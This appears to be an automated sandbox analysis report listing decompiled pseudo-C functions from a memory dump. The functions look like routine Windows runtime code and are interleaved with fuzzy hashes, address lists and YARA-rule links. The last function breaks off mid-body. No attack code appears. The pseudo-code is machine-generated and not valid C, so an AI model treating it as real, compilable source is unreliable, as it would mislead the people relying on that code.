Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc52cb196680f81a6aafbf6ff06e70b82dc05b0d203cb86652b6f9ba7e265ae1
Instruction ID: 3d03869df9949363aaaf36b1cff2a3a1dea93b189b5fc9a52eb7201101c4df19
Opcode Fuzzy Hash: cc52cb196680f81a6aafbf6ff06e70b82dc05b0d203cb86652b6f9ba7e265ae1
Instruction Fuzzy Hash: 3401D1726012089FD315AF08E840F397BFAFB45320F224426F1059B6A1C774EC81CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 05154015, Relevance: .0, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E05154015(signed int __eax, signed int __ecx) {
				void* __ebx;
				void* __edi;
				signed char _t10;
				signed int _t28;

				_push(__ecx);
				_t28 = __ecx;
				asm("lock xadd [edi+0x24], eax");
				_t10 = (__eax | 0xffffffff) - 1;
				if(_t10 == 0) {
					_t1 = _t28 + 0x1c; // 0x1e
					E050A2280(_t10, _t1);
					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
					E050A2280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x51786ac);
					E0508F900(0x51786d4, _t28);
					E0509FFB0(0x51786ac, _t28, 0x51786ac);
					 *((intOrPtr*)(_t28 + 0x20)) = 0;
					E0509FFB0(0, _t28, _t1);
					_t18 =  *((intOrPtr*)(_t28 + 0x94));
					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
						L050A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
					}
					_t10 = L050A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
				}
				return _t10;
			}

0x0515401a
0x0515401e
0x05154023
0x05154028
0x05154029
0x0515402b
0x0515402f
0x05154043
0x05154046
0x05154051
0x05154057
0x0515405f
0x05154062
0x05154067
0x0515406f
0x0515407c
0x0515407c
0x0515408c
0x0515408c
0x05154097

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 403ceb971bc6bd4e666c924d2c483d2ccd9b7c78fa2302517e5ba556d529fe6c
Instruction ID: ee634b31e31797ae938ad37cde12fb85d9eb7df96b0da8e1382325113cf993f9
Opcode Fuzzy Hash: 403ceb971bc6bd4e666c924d2c483d2ccd9b7c78fa2302517e5ba556d529fe6c
Instruction Fuzzy Hash: 3F018F72301946BFD611ABB9DE88EABB7ACFF55660B000225F50883A11DB34EC51C7E4

Uniqueness

Uniqueness Score: -1.00%

Function 051414FB, Relevance: .0, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E051414FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x517d360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E050CFA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1034;
				if(E050A7D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E050CB640(E050C9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x051414fb
0x051414fb
0x0514150a
0x05141514
0x05141519
0x0514151b
0x05141526
0x0514152c
0x05141534
0x05141537
0x0514153a
0x05141545
0x05141557
0x05141547
0x05141550
0x05141550
0x05141562
0x05141563
0x05141565
0x0514156a
0x0514157f

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ccb5bfd036e3eed831c527fd8bc05285d457b64d3b07d4e6afffaa4c78bd6df
Instruction ID: b3cf7f3391edc29c0066a4b29bdc003cda36f71297fd28571074ee768af5d2de
Opcode Fuzzy Hash: 7ccb5bfd036e3eed831c527fd8bc05285d457b64d3b07d4e6afffaa4c78bd6df
Instruction Fuzzy Hash: 0C019271A0024CAFCB14DFA9D846EEEBBB8EF45700F40405AF905EB380DA74DA40CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0514138A, Relevance: .0, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E0514138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x517d360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E050CFA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1033;
				if(E050A7D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E050CB640(E050C9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x0514138a
0x0514138a
0x05141399
0x051413a3
0x051413a8
0x051413aa
0x051413b5
0x051413bb
0x051413c3
0x051413c6
0x051413c9
0x051413d4
0x051413e6
0x051413d6
0x051413df
0x051413df
0x051413f1
0x051413f2
0x051413f4
0x051413f9
0x0514140e

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a11525523ab3ee74b6ae312231698a4c80ca1e7d2985b2019e40c26d70351f0
Instruction ID: 93b0af8fabfb8e624733c954c85176db6ab89b4c65dded7fe32d60ca45f83008
Opcode Fuzzy Hash: 0a11525523ab3ee74b6ae312231698a4c80ca1e7d2985b2019e40c26d70351f0
Instruction Fuzzy Hash: A1015271E0035CAFDB14DFA9D846EAEBBB8EF45710F40405AB905EB380DA749A41CB95

Uniqueness

Uniqueness Score: -1.00%

Function 050858EC, Relevance: .0, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E050858EC(intOrPtr __ecx) {
				signed int _v8;
				char _v28;
				char _v44;
				char _v76;
				void* __edi;
				void* __esi;
				intOrPtr _t10;
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_v8 =  *0x517d360 ^ _t29;
				_t10 =  *[fs:0x30];
				_t27 = __ecx;
				if(_t10 == 0) {
					L6:
					_t28 = 0x5065c80;
				} else {
					_t16 =  *((intOrPtr*)(_t10 + 0x10));
					if(_t16 == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(_t16 + 0x3c));
					}
				}
				if(E05085943() != 0 &&  *0x5175320 > 5) {
					E05107B5E( &_v44, _t27);
					_t22 =  &_v28;
					E05107B5E( &_v28, _t28);
					_t11 = E05107B9C(0x5175320, 0x506bf15,  &_v28, _t22, 4,  &_v76);
				}
				return E050CB640(_t11, _t17, _v8 ^ _t29, 0x506bf15, _t27, _t28);
			}

0x050858fb
0x050858fe
0x05085906
0x0508590a
0x0508593c
0x0508593c
0x0508590c
0x0508590c
0x05085911
0x00000000
0x05085913
0x05085913
0x05085913
0x05085911
0x0508591d
0x050e1035
0x050e103c
0x050e103f
0x050e1056
0x050e1056
0x0508593b

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 853d1d26959e72dd41e8382987c4b217b94f0d190c3b6cfa8c8c1c9f0514aaa7
Instruction ID: 5acd38b207bb96eac1355f6b43175a060939febf486e0693fc28741c765a51a7
Opcode Fuzzy Hash: 853d1d26959e72dd41e8382987c4b217b94f0d190c3b6cfa8c8c1c9f0514aaa7
Instruction Fuzzy Hash: D001A771B04508ABC714FB29FC45DBF7BB9EF40270F950069A895AB291DF70ED01CA90

Uniqueness

Uniqueness Score: -1.00%

Function 0509B02A, Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0509B02A(intOrPtr __ecx, signed short* __edx, short _a4) {
				signed char _t11;
				signed char* _t12;
				intOrPtr _t24;
				signed short* _t25;

				_t25 = __edx;
				_t24 = __ecx;
				_t11 = ( *[fs:0x30])[0x50];
				if(_t11 != 0) {
					if( *_t11 == 0) {
						goto L1;
					}
					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
					L2:
					if( *_t12 != 0) {
						_t12 =  *[fs:0x30];
						if((_t12[0x240] & 0x00000004) == 0) {
							goto L3;
						}
						if(E050A7D50() == 0) {
							_t12 = 0x7ffe0385;
						} else {
							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t12 & 0x00000020) == 0) {
							goto L3;
						}
						return E05107016(_a4, _t24, 0, 0, _t25, 0);
					}
					L3:
					return _t12;
				}
				L1:
				_t12 = 0x7ffe0384;
				goto L2;
			}

0x0509b037
0x0509b039
0x0509b03b
0x0509b040
0x050ea60e
0x00000000
0x00000000
0x050ea61d
0x0509b04b
0x0509b04e
0x050ea627
0x050ea634
0x00000000
0x00000000
0x050ea641
0x050ea653
0x050ea643
0x050ea64c
0x050ea64c
0x050ea65b
0x00000000
0x00000000
0x00000000
0x050ea66c
0x0509b057
0x0509b057
0x0509b057
0x0509b046
0x0509b046
0x00000000

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
Instruction ID: 854d0857499a95740447c5c4b514cbd222a2862ea7e4b821d31742c2ac73aa3c
Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
Instruction Fuzzy Hash: 5E01B1323089809FD726C71DF888F7E77D9FB86750F0900A1F915CB6A5D668DC40C620

Uniqueness

Uniqueness Score: -1.00%

Function 05151074, Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E05151074(void* __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
				char _v8;
				void* _v11;
				unsigned int _v12;
				void* _v15;
				void* __esi;
				void* __ebp;
				char* _t16;
				signed int* _t35;

				_t22 = __ebx;
				_t35 = __ecx;
				_v8 = __edx;
				_t13 =  !( *__ecx) + 1;
				_v12 =  !( *__ecx) + 1;
				if(_a4 != 0) {
					E0515165E(__ebx, 0x5178ae4, (__edx -  *0x5178b04 >> 0x14) + (__edx -  *0x5178b04 >> 0x14), __edi, __ecx, (__edx -  *0x5178b04 >> 0x14) + (__edx -  *0x5178b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
				}
				E0514AFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
				if(E050A7D50() == 0) {
					_t16 = 0x7ffe0388;
				} else {
					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				if( *_t16 != 0) {
					_t16 = E0513FE3F(_t22, _t35, _v8, _v12);
				}
				return _t16;
			}

0x05151074
0x05151080
0x05151082
0x0515108a
0x0515108f
0x05151093
0x051510ab
0x051510ab
0x051510c3
0x051510cf
0x051510e1
0x051510d1
0x051510da
0x051510da
0x051510e9
0x051510f5
0x051510f5
0x051510fe

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc43a31e061dc5584ca76cd93829492c3cd793fca517ba7675519560eda7f9a4
Instruction ID: 4310bbc7de0d4fc5361e507a87a0db85d2fb4937b9c82c39e84794cd0eeb6135
Opcode Fuzzy Hash: bc43a31e061dc5584ca76cd93829492c3cd793fca517ba7675519560eda7f9a4
Instruction Fuzzy Hash: 85012872644745EFC711DF68C948B1A77E5BB84220F048629FC9683291DF34D445CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0513FE3F, Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E0513FE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x517d360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E050CFA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x267;
				if(E050A7D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E050CB640(E050C9AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x0513fe3f
0x0513fe3f
0x0513fe4e
0x0513fe58
0x0513fe5d
0x0513fe5f
0x0513fe6a
0x0513fe72
0x0513fe75
0x0513fe78
0x0513fe83
0x0513fe95
0x0513fe85
0x0513fe8e
0x0513fe8e
0x0513fea0
0x0513fea1
0x0513fea3
0x0513fea8
0x0513febd

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e3327650e75b8bf43f64f5236a1ca13f7929bde8d2601a03755f16c907dbb6f
Instruction ID: c56f30feaddd5976abaf0b260799bb2dfe1aa5a15906ab307f475d2dc5b7b0cb
Opcode Fuzzy Hash: 3e3327650e75b8bf43f64f5236a1ca13f7929bde8d2601a03755f16c907dbb6f
Instruction Fuzzy Hash: 82018471E0024CABDB14DFA9E846FAFBBB8EF45700F00406AB900EB381DA749941C795

Uniqueness

Uniqueness Score: -1.00%

Function 0513FEC0, Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E0513FEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x517d360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E050CFA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x266;
				if(E050A7D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E050CB640(E050C9AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x0513fec0
0x0513fec0
0x0513fecf
0x0513fed9
0x0513fede
0x0513fee0
0x0513feeb
0x0513fef3
0x0513fef6
0x0513fef9
0x0513ff04
0x0513ff16
0x0513ff06
0x0513ff0f
0x0513ff0f
0x0513ff21
0x0513ff22
0x0513ff24
0x0513ff29
0x0513ff3e

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 071b2a4bd63f91db9f7fda669b19bda463d706655e442f64be4b8e2ad13afdf6
Instruction ID: dd2f8c0485a6b6e7a5f30b47d5623d44d6cfd3a83a57815b77e48b36afffffa4
Opcode Fuzzy Hash: 071b2a4bd63f91db9f7fda669b19bda463d706655e442f64be4b8e2ad13afdf6
Instruction Fuzzy Hash: F2018471E0024CABDB14DBA9E846FAEBBB8EF45700F40406AF901EB380DA749A01C795

Uniqueness

Uniqueness Score: -1.00%

Function 05158A62, Relevance: .0, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E05158A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char* _t18;
				signed int _t32;

				_t29 = __edx;
				_v12 =  *0x517d360 ^ _t32;
				_t31 = _a8;
				_t30 = _a12;
				_v66 = 0x1c20;
				_v40 = __ecx;
				_v36 = __edx;
				_v32 = _a4;
				_v28 = _a8;
				_v24 = _a12;
				if(E050A7D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v72);
				_push(0x14);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E050CB640(E050C9AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x05158a62
0x05158a71
0x05158a79
0x05158a82
0x05158a85
0x05158a89
0x05158a8c
0x05158a8f
0x05158a92
0x05158a95
0x05158a9f
0x05158ab1
0x05158aa1
0x05158aaa
0x05158aaa
0x05158abc
0x05158abd
0x05158abf
0x05158ac4
0x05158ada

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d2fb0fe25e4b60a393d4794cc19d8cee591187edc1afead15ad632da43327a6d
Instruction ID: c4779aa6471ad339383352a3c00bf2530710427ce81a82d39203242c93d1cd9f
Opcode Fuzzy Hash: d2fb0fe25e4b60a393d4794cc19d8cee591187edc1afead15ad632da43327a6d
Instruction Fuzzy Hash: 11011AB2A0021CAFCB04DFA9E9459EEBBB8EF59310F10445AF905E7341DA34A9008BA0

Uniqueness

Uniqueness Score: -1.00%

Function 05158ED6, Relevance: .0, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E05158ED6(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				short _v62;
				char _v68;
				signed char* _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t42;
				signed int _t43;

				_t40 = __edx;
				_v8 =  *0x517d360 ^ _t43;
				_v28 = __ecx;
				_v62 = 0x1c2a;
				_v36 =  *((intOrPtr*)(__edx + 0xc8));
				_v32 =  *((intOrPtr*)(__edx + 0xcc));
				_v20 =  *((intOrPtr*)(__edx + 0xd8));
				_v16 =  *((intOrPtr*)(__edx + 0xd4));
				_v24 = __edx;
				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
				if(E050A7D50() == 0) {
					_t29 = 0x7ffe0386;
				} else {
					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v68);
				_push(0x1c);
				_push(0x20402);
				_push( *_t29 & 0x000000ff);
				return E050CB640(E050C9AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
			}

0x05158ed6
0x05158ee5
0x05158eed
0x05158ef0
0x05158efa
0x05158f03
0x05158f0c
0x05158f15
0x05158f24
0x05158f27
0x05158f31
0x05158f43
0x05158f33
0x05158f3c
0x05158f3c
0x05158f4e
0x05158f4f
0x05158f51
0x05158f56
0x05158f69

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 381a11917ceb717224f52860fc2cfaf987a077ce4fb2b9c543ae708cb9fc23e9
Instruction ID: b3a8a658cdbf2760751d20dd27c9ebee7c53d4fa9d41ad1cb9642c109370a704
Opcode Fuzzy Hash: 381a11917ceb717224f52860fc2cfaf987a077ce4fb2b9c543ae708cb9fc23e9
Instruction Fuzzy Hash: 0D11DE71A04659DFDB04DFA9D545BAEBBF4FF08300F1442AAE919EB782E6349940CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0508DB60, Relevance: .0, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0508DB60(signed int __ecx) {
				intOrPtr* _t9;
				void* _t12;
				void* _t13;
				intOrPtr _t14;

				_t9 = __ecx;
				_t14 = 0;
				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
					_t13 = 0xc000000d;
				} else {
					_t14 = E0508DB40();
					if(_t14 == 0) {
						_t13 = 0xc0000017;
					} else {
						_t13 = E0508E7B0(__ecx, _t12, _t14, 0xfff);
						if(_t13 < 0) {
							L0508E8B0(__ecx, _t14, 0xfff);
							L050A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
							_t14 = 0;
						} else {
							_t13 = 0;
							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
						}
					}
				}
				 *_t9 = _t14;
				return _t13;
			}

0x0508db64
0x0508db66
0x0508db6b
0x0508dbaa
0x0508db71
0x0508db76
0x0508db7a
0x0508dba3
0x0508db7c
0x0508db87
0x0508db8b
0x050e4fa1
0x050e4fb3
0x050e4fb8
0x0508db91
0x0508db96
0x0508db98
0x0508db98
0x0508db8b
0x0508db7a
0x0508db9d
0x0508dba2

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
Instruction ID: 70ab5e342469437dbbdfd22eb20d111e93abf7311dd0e882b061ef99fdb6172c
Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
Instruction Fuzzy Hash: 5BF0FC33305532DFD7327A95A894F7FB69A9FD2A60F1D0135F2459B384C9608C0286D0

Uniqueness

Uniqueness Score: -1.00%

Function 0508B1E1, Relevance: .0, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0508B1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
				signed char* _t13;
				intOrPtr _t22;
				char _t23;

				_t23 = __edx;
				_t22 = __ecx;
				if(E050A7D50() != 0) {
					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
				} else {
					_t13 = 0x7ffe0384;
				}
				if( *_t13 != 0) {
					_t13 =  *[fs:0x30];
					if((_t13[0x240] & 0x00000004) == 0) {
						goto L3;
					}
					if(E050A7D50() == 0) {
						_t13 = 0x7ffe0385;
					} else {
						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
					}
					if(( *_t13 & 0x00000020) == 0) {
						goto L3;
					}
					return E05107016(0x14a4, _t22, _t23, _a4, _a8, 0);
				} else {
					L3:
					return _t13;
				}
			}

0x0508b1e8
0x0508b1ea
0x0508b1f3
0x050e4a17
0x0508b1f9
0x0508b1f9
0x0508b1f9
0x0508b201
0x050e4a21
0x050e4a2e
0x00000000
0x00000000
0x050e4a3b
0x050e4a4d
0x050e4a3d
0x050e4a46
0x050e4a46
0x050e4a55
0x00000000
0x00000000
0x00000000
0x0508b20a
0x0508b20a
0x0508b20a
0x0508b20a

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
Instruction ID: f50ebc1ad2c63fb6e5c4f1168cc6c67121e13bf762f201e1d6706750c2b4c0b2
Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
Instruction Fuzzy Hash: 8101D132204A809FD722A759E808F7E7BDAFF51760F1D40A1F9558B6B1DA79D800C314

Uniqueness

Uniqueness Score: -1.00%

Function 0511FE87, Relevance: .0, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E0511FE87(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_v8 =  *0x517d360 ^ _t35;
				_v16 = __ecx;
				_v54 = 0x1722;
				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
				_v28 =  *((intOrPtr*)(__ecx + 4));
				_v20 =  *((intOrPtr*)(__ecx + 0xc));
				if(E050A7D50() == 0) {
					_t21 = 0x7ffe0382;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E050CB640(E050C9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x0511fe96
0x0511fe9e
0x0511fea1
0x0511fead
0x0511feb3
0x0511feb9
0x0511fec3
0x0511fed5
0x0511fec5
0x0511fece
0x0511fece
0x0511fee0
0x0511fee1
0x0511fee3
0x0511fee8
0x0511fefb

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ae6e3f682276935542443fd896984cc3886896c7f49cb2eafe2da1482aff343
Instruction ID: dbf878905fbb7050d08efc94c478dd70c3c8fb85cca3896fde45c579acca3f1c
Opcode Fuzzy Hash: 8ae6e3f682276935542443fd896984cc3886896c7f49cb2eafe2da1482aff343
Instruction Fuzzy Hash: 68018670A0020CEFCB14DFA8D546AAEBBF4FF04300F1041A9B945EB382DA35E902CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0514131B, Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E0514131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x517d360 ^ _t32;
				_v20 = _a4;
				_v12 = _a8;
				_v24 = __ecx;
